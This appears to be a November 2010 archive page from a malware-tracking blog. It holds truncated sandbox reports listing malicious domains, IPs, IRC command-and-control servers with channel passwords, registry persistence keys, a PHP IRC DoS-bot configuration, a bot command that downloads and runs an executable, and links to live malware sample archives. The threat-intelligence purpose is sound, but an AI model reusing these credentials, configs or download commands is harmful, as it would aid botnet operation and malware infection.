Month: November 2010

securebillpayment1.com 88.208.221.204 sysupdatenbz.com 78.26.179.19 sysupdateyte.com 78.26.179.19 Download URLs http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) http://78.26.179.19/0004098213 (sysupdatenbz.com) Outgoing connection to remote server: securebillpayment1.com TCP port 80 Outgoing connection to remote server: securebillpayment1.com TCP port 80 Outgoing connection to remote server: securebillpayment1.com TCP port 80 Outgoing connection to remoteRead more...

contentserver001.info contentserver001.info 188.95.159.128 www.google.com www.google.com 74.125.43.99 Opened listening TCP connection on port: 21968Download URLs http://188.95.159.128/forum/img/img_1582.jpg (contentserver001.info) http://74.125.43.99/webhp (www.google.com) Outgoing connection to remote server: contentserver001.info TCP port 80 Outgoing connection to remote server: contentserver001.info TCP port 80 Outgoing connection to remote server: contentserver001.info TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 RegistryRead more...

var $config = array(“server”=>”204.188.198.116”, “port”=>6667, “pass”=>”p0015123”, //senha do server “prefix”=>”DosNet|”, “maxrand”=>8, “chan”=>”#php#”, “key”=>””, //senha do canal “modes”=>”+p”, “password”=>”p0015123”, //senha do bot “trigger”=>”.”, “hostauth”=>”*” // * for any hostname

Host Name IP Address bnsettings.com bnsettings.com 91.212.124.35 Download URLs http://91.218.229.143/ (91.218.229.143) http://91.218.229.143/ (91.218.229.143) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://91.218.229.143/ (91.218.229.143) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131) http://74.53.182.127/ (74.53.182.127) http://74.53.28.130/ (74.53.28.130) http://74.53.28.131/ (74.53.28.131)Read more...

here u can download and analyse your self around 14 mb exe files from diferent malwares Download: http://0dc07835.thesegalleries.com Download: http://3533e7ca.seriousfiles.com

DNS Lookup Host Name IP Address 41.223.57.74 41.223.57.74 189.15.169.8 189.15.169.8 110.164.132.173 110.164.132.173 124.121.252.251 124.121.252.251 85.65.114.130 85.65.114.130 78.84.61.144 78.84.61.144 213.46.47.24 213.46.47.24 92.36.133.91 92.36.133.91 125.166.238.78 125.166.238.78 213.222.182.79 213.222.182.79 213.238.78.146 213.238.78.146 109.122.73.66 109.122.73.66 109.110.2.245 109.110.2.245 115.240.75.183 115.240.75.183 84.72.52.118 84.72.52.118 77.239.10.86 77.239.10.86 82.45.76.46 82.45.76.46 123.0.41.218 123.0.41.218 201.134.68.250 201.134.68.250 200.84.103.163 200.84.103.163 119.235.85.79 119.235.85.79 208.81.160.62 208.81.160.62 85.187.247.18 85.187.247.18 115.87.108.87 115.87.108.87 119.235.79.82Read more...

bbg.moiservice.com 74.117.174.82 i3ED6DA76.versanet.de 62.214.218.118 Opened listening TCP connection on port: 55907 Opened listening TCP connection on port: 113 C&C Server: 74.117.174.82:16667 Server Password: Username: laMer Nickname: XP|Ubd2 Channel: #lbl# (Password: lam) Channeltopic: : Username: icbx Nickname: [DEU]XP-SP3[00]6455 Channel: #l# (Password: lam) Channeltopic: :.asc asn445 50 3 120 -r -b -s Registry Changes by all processesRead more...

us.unicatz.com 74.117.174.82 C&C Server: 74.117.174.82:2010 Server Password: Username: okcbisjs Nickname: okcbisjs Channel: #us# (Password: d0s) Channeltopic: : Now talking in #us# Topic On: [ #us# ] [ .msn.addcontact wingate32.exe wingate32.zip wingate32.rar estas foto son toyo? estas foto son toyo? ] Topic By: [ dgdg ] (dgdg) .l huh (dgdg) .down http://attacke.100free.com/inanaged.exe c:inanaged.exe 1 Registry ChangesRead more...

minerva.cdmon.org 184.106.215.31 C&C Server: 184.106.215.31:6667 Server Password: Username: DELL-D3E62F7E26 Nickname: {XPDEU503896} Channel: ##key## (Password: moneylover) Channeltopic: : Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update” = C:DOKUME~1ADMINI~1LOKALE~1Tempservice.exe HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Services” = service.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Windows Update” = C:DOKUME~1ADMINI~1LOKALE~1Tempservice.exe Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext” HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsRead more...

DNS Lookup Host Name IP Address direct.ips.co.jp 202.218.13.230 loja.tray.com.br 201.20.35.20 www.imusica.com.br 201.49.212.100 www.digimer.com.br 187.17.83.154 www.kajima.co.jp 203.180.140.61 www.ristex.jp 222.146.58.38 m-repo.lib.meiji.ac.jp 133.26.200.10 www.science-forum.co.jp 202.191.113.9 bunker.org.ua 195.214.214.53 opens www.iknow.co.jp 184.72.216.126 secure.fox shop.poziti rastu.com.ua Outgoing connection to remote server: 208.110.80.34 TCP port 443 Outgoing connection to remote server: direct.ips.co.jp TCP port 443 Outgoing connection to remote server: loja.tray.com.br TCPRead more...